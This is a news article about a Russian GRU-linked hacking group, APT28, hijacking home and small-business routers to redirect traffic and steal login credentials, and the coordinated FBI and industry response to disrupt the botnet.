Russian state-backed hackers infiltrate thousands of home routers to steal login credentials

A group of hackers linked to the Russian government has taken control of thousands of home and small-business routers worldwide as part of an ongoing campaign to reroute internet traffic and steal user credentials, according to warnings issued Tuesday by security researchers and government agencies.

The activity has been attributed to the long-established Russian hacking unit known as Fancy Bear, also referred to as APT28. The group has previously been associated with major cyber operations, including the 2016 breach of the Democratic National Committee and the 2022 cyberattack that disrupted satellite provider Viasat. The group is widely believed to operate under Russia’s military intelligence agency, the GRU.

According to findings released by the U.K.’s National Cyber Security Centre (NCSC) and Black Lotus Labs, the attackers exploited known vulnerabilities in routers manufactured by MikroTik and TP-Link. These vulnerabilities were already publicly disclosed, but many devices remained unpatched, making them easy targets.

Researchers reported that the campaign has allowed the hackers to monitor large numbers of individuals over several years by compromising routers that often run outdated software. In many cases, the device owners were unaware that their hardware had been breached.

The NCSC noted that the campaign appears opportunistic, with attackers targeting a broad pool of potential victims before focusing on individuals or organisations of particular intelligence value.

Once access to a router is gained, the attackers modify its configuration so that internet traffic is quietly routed through servers controlled by the hackers. This enables them to redirect users to fraudulent websites designed to capture login credentials and authentication tokens. With this information, attackers can access online accounts without requiring two-factor authentication codes.

Black Lotus Labs estimated that at least 18,000 victims across approximately 120 countries have been affected. These include government agencies, law enforcement organisations, and email service providers in regions such as North Africa, Central America, and Southeast Asia.

Microsoft also released its own analysis of the campaign, stating that it had identified more than 200 organisations and approximately 5,000 consumer devices affected, including at least three government entities in Africa.

Authorities in the United States have taken action in response to the campaign. The Federal Bureau of Investigation is expected to announce the seizure of several domains used by the attackers. Lumen Technologies confirmed that it worked alongside a coalition, including the FBI, to disrupt the botnet infrastructure and take it offline.

Although the FBI did not provide immediate comment before publication, the US Department of Justice later confirmed that it had neutralised compromised routers located within the United States following court authorisation. According to the DOJ, the FBI deployed a set of commands to affected devices to gather evidence, reset configurations, and block further unauthorised access attempts.

The campaign highlights ongoing risks posed by unpatched network devices and underscores the importance of maintaining up-to-date firmware and security settings to prevent unauthorised intrusions.